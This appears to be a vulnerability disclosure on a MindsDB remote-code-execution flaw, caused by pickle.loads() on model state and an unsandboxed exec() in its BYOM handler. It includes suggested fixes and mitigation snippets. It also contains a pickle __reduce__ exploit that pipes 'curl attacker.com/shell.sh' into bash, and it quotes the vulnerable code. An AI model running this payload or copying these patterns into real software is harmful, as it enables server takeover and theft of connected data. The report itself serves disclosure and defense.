MindsDB: RCE via pickle.loads() in BYOM (Bring Your Own Model) Handler
Vulnerability Type
CWE-502: Deserialization of Untrusted Data
Severity
Critical: any user who can create a BYOM model achieves Remote Code Execution on the MindsDB server.
Affected Code
File: mindsdb/integrations/handlers/byom_handler/byom_handler.py
Three functions deserialize user-controlled model state:
# Line 398: predict()
def predict(self, df, model_state, args):
    model_state = pickle.loads(model_state)  # <- RCE
    self.model_instance.__dict__ = model_state

# Line 407: finetune()
def finetune(self, df, model_state, args):
    self.model_instance.__dict__ = pickle.loads(model_state)  # <- RCE

# Line 419: describe()
def describe(self, model_state, attribute=None):
    model_state = pickle.loads(model_state)  # <- RCE
    self.model_instance.__dict__ = model_state
Also affected:
mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55:
    model_state = pickle.loads(model_state)  # subprocess wrapper
mindsdb/interfaces/query_context/context_controller.py:275:
    steps_data = pickle.loads(data)  # from cache
mindsdb/integrations/libs/process_cache.py:45:
    # IPC via pickle: exception propagation
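Call sites like the ones listed above can be enumerated mechanically rather than by hand. The following is a minimal sketch of such an audit helper using Python's standard `ast` module. The function name `find_pickle_loads` and the sample source are illustrative assumptions, not part of MindsDB, and the scan only catches the literal `pickle.load`/`pickle.loads` attribute form (aliased imports such as `from pickle import loads` would be missed).

```python
import ast


def find_pickle_loads(source: str, filename: str = "<string>"):
    """Return sorted (line, call) tuples for pickle.load / pickle.loads calls."""
    hits = []
    tree = ast.parse(source, filename=filename)
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Match only the literal `pickle.<load|loads>(...)` attribute form.
        if (
            isinstance(func, ast.Attribute)
            and func.attr in {"load", "loads"}
            and isinstance(func.value, ast.Name)
            and func.value.id == "pickle"
        ):
            hits.append((node.lineno, f"pickle.{func.attr}"))
    return sorted(hits)


# Hypothetical sample resembling the predict() excerpt above.
sample = '''
import pickle

def predict(self, df, model_state, args):
    model_state = pickle.loads(model_state)
    return model_state
'''

print(find_pickle_loads(sample))
```

Running the helper over each file in a source tree gives a starting list for review; each hit still needs a manual check of where the bytes come from.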
Attack Chain
- Attacker creates a BYOM model via MindsDB SQL:
  CREATE MODEL pwned
  PREDICT target
  USING engine='byom',
        code='class Model: pass';
- The model's train() returns pickle.dumps(self.__dict__), but an attacker who controls the model code can override __dict__ to contain a malicious pickle payload.
- When predict() is called (e.g., SELECT * FROM pwned WHERE ...), the server deserializes the model state with pickle.loads(model_state), which results in arbitrary code execution.
Alternative: Direct state injection
If the attacker has access to the MindsDB storage backend (database), they can directly replace the model state bytes with a malicious pickle:
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

malicious_state = pickle.dumps(Exploit())
# Insert into model storage; the next predict() call triggers RCE
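One possible mitigation for the storage-tampering variant specifically is to authenticate the stored bytes before deserializing them. The sketch below assumes a server-side secret that the storage backend never sees. The names `sign_state`, `verify_state`, and the key value are hypothetical and do not come from MindsDB. Note that this does not address the primary attack chain, where the attacker's own model code produces the state and it would be signed like any other.

```python
import hashlib
import hmac
import pickle

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for SHA-256


def sign_state(state_bytes: bytes, key: bytes) -> bytes:
    """Prefix the serialized state with an HMAC-SHA256 tag."""
    tag = hmac.new(key, state_bytes, hashlib.sha256).digest()
    return tag + state_bytes


def verify_state(blob: bytes, key: bytes) -> bytes:
    """Return the state bytes only if the tag matches; raise otherwise."""
    if len(blob) < TAG_LEN:
        raise ValueError("model state too short to carry a tag")
    tag, state_bytes = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, state_bytes, hashlib.sha256).digest()
    # compare_digest avoids leaking the mismatch position through timing.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("model state failed integrity check")
    return state_bytes


# Hypothetical key; in practice it would come from server configuration.
key = b"hypothetical-server-side-secret"
blob = sign_state(pickle.dumps({"weights": [1, 2, 3]}), key)

# Deserialize only after the integrity check has passed.
state = pickle.loads(verify_state(blob, key))
```

The design choice here is to fail closed: any blob that was modified in storage, or written without the key, is rejected before `pickle.loads` ever sees it.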
AI Impact (10x Multiplier)
MindsDB is an AI-in-database platform. The BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:
- Model poisoning: replace a legitimate model with a backdoored version
- Training data exfiltration: RCE gives access to all data MindsDB has access to
- Database compromise: MindsDB connects to user databases (MySQL, PostgreSQL, etc.), so RCE gives access to all connected data sources
- Supply chain: a poisoned model persists across restarts and affects all queries
Known CVE Context
MindsDB has prior code-execution CVEs (CVE-2024-45846, CVE-2024-45847: eval injection via Weaviate integration). This BYOM pickle.loads is a different, previously unreported vector.
Suggested Fix
Replace pickle.loads with a safe alternative:
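import json

def predict(self, df, model_state, args):
    # Use JSON-based deserialization instead of pickle.
    # This requires train() to emit JSON (json.dumps) rather than pickle.dumps,
    # and the model state to consist of JSON-serializable values.
    model_state = json.loads(model_state)
    # Or use a restricted unpickler (needs `import io` and a pickle.Unpickler
    # subclass that overrides find_class):
    # model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
    self.model_instance.__dict__ = model_state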
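The RestrictedUnpickler mentioned in the commented-out line is not defined in the suggested fix. A minimal sketch follows, based on the "restricting globals" pattern from the Python pickle documentation. The allow-list `SAFE_BUILTINS` and the helper `restricted_loads` are assumptions chosen for illustration. Real model states holding NumPy arrays or scikit-learn objects would be rejected by this allow-list, and widening it reintroduces risk.

```python
import builtins
import io
import pickle

# Hypothetical allow-list: plain container and scalar types only.
SAFE_BUILTINS = {
    "dict", "list", "set", "frozenset", "tuple",
    "int", "float", "complex", "str", "bytes", "bool",
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # find_class is called whenever the pickle stream requests a global
        # (a class or function); everything outside the allow-list is refused.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads() that uses the restricted unpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain data round-trips as usual.
print(restricted_loads(pickle.dumps({"weights": [0.1, 0.2]})))
```

A payload built with `__reduce__` has to name its callable as a global, so it reaches `find_class` and raises `pickle.UnpicklingError` instead of executing.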
Invariant Violated
S16 (DeserializationGuard): Application MUST NOT use pickle.loads on data from user-controlled or shared storage.
Additional Finding: Direct exec() on User Model Code
File: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80
def import_string(code, module_name='model'):
    module = types.ModuleType(module_name)
    exec(code, module.__dict__)  # <- Direct code execution, NO sandbox
    return module
This is the execution path for BYOM models. When a user creates a model with engine='byom', their Python code is passed to import_string(), which calls exec() with no sandboxing, no AST filtering, and no import restrictions.
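To illustrate the kind of AST filtering that is absent, here is a minimal sketch of a pre-exec check. The allow-list `ALLOWED_IMPORTS`, the deny-list `BANNED_NAMES`, and the function `check_model_code` are hypothetical. A filter like this is easy to bypass (for example through attribute access on already-available objects) and is not a sandbox; it could only complement process-level isolation, never replace it.

```python
import ast

# Hypothetical policy values, chosen only for illustration.
ALLOWED_IMPORTS = {"math", "numpy", "pandas"}
BANNED_NAMES = {"eval", "exec", "__import__", "compile", "open"}


def check_model_code(code: str) -> list:
    """Return a list of policy violations found in the submitted source."""
    problems = []
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] not in ALLOWED_IMPORTS:
                    problems.append(f"line {node.lineno}: import of {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            # node.module is None for relative imports such as `from . import x`.
            root = (node.module or "").split(".")[0]
            if root not in ALLOWED_IMPORTS:
                problems.append(f"line {node.lineno}: import from {node.module}")
        elif isinstance(node, ast.Name) and node.id in BANNED_NAMES:
            problems.append(f"line {node.lineno}: use of {node.id}")
    return problems


print(check_model_code("import os\nclass Model: pass\n"))
```

A caller would reject the model when the returned list is non-empty, before the code ever reaches exec().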
The same file also uses pickle.loads() for IPC (stdin/stdout between parent and worker):
def decode(encoded):
    return pickle.loads(encoded)  # Line 55

def get_input():
    with open(0, 'rb') as fd:
        encoded = fd.read()
    obj = decode(encoded)  # pickle.loads on stdin
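Because the worker process runs user-supplied code, messages coming back from it cannot be trusted, so a data-only wire format is a natural fit for this channel. The following is a minimal sketch of JSON-based replacements for the encode/decode pair. It assumes every IPC message can be expressed as a JSON object; values such as DataFrames would first need conversion to a JSON-friendly form (for example with pandas' `DataFrame.to_json`), which is not shown here.

```python
import json


def encode(obj) -> bytes:
    """Serialize an IPC message to UTF-8 JSON bytes (data only, no code)."""
    return json.dumps(obj).encode("utf-8")


def decode(encoded: bytes):
    """Parse an IPC message and insist on a JSON object at the top level."""
    obj = json.loads(encoded.decode("utf-8"))
    if not isinstance(obj, dict):
        raise ValueError("IPC message must be a JSON object")
    return obj


# Hypothetical message shape, for illustration only.
message = {"method": "predict", "args": {"n": 1}}
print(decode(encode(message)))
```

Unlike pickle, JSON parsing can only yield dicts, lists, strings, numbers, booleans, and None, so a malicious peer cannot make the receiver call arbitrary functions during decoding.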
Combined Chain
- User creates BYOM model with malicious code -> exec(code) -> RCE
- Even if exec were sandboxed, the pickle IPC channel is unprotected -> pickle.loads bypass
This is a defense-in-depth failure: two independent RCE vectors in the same module.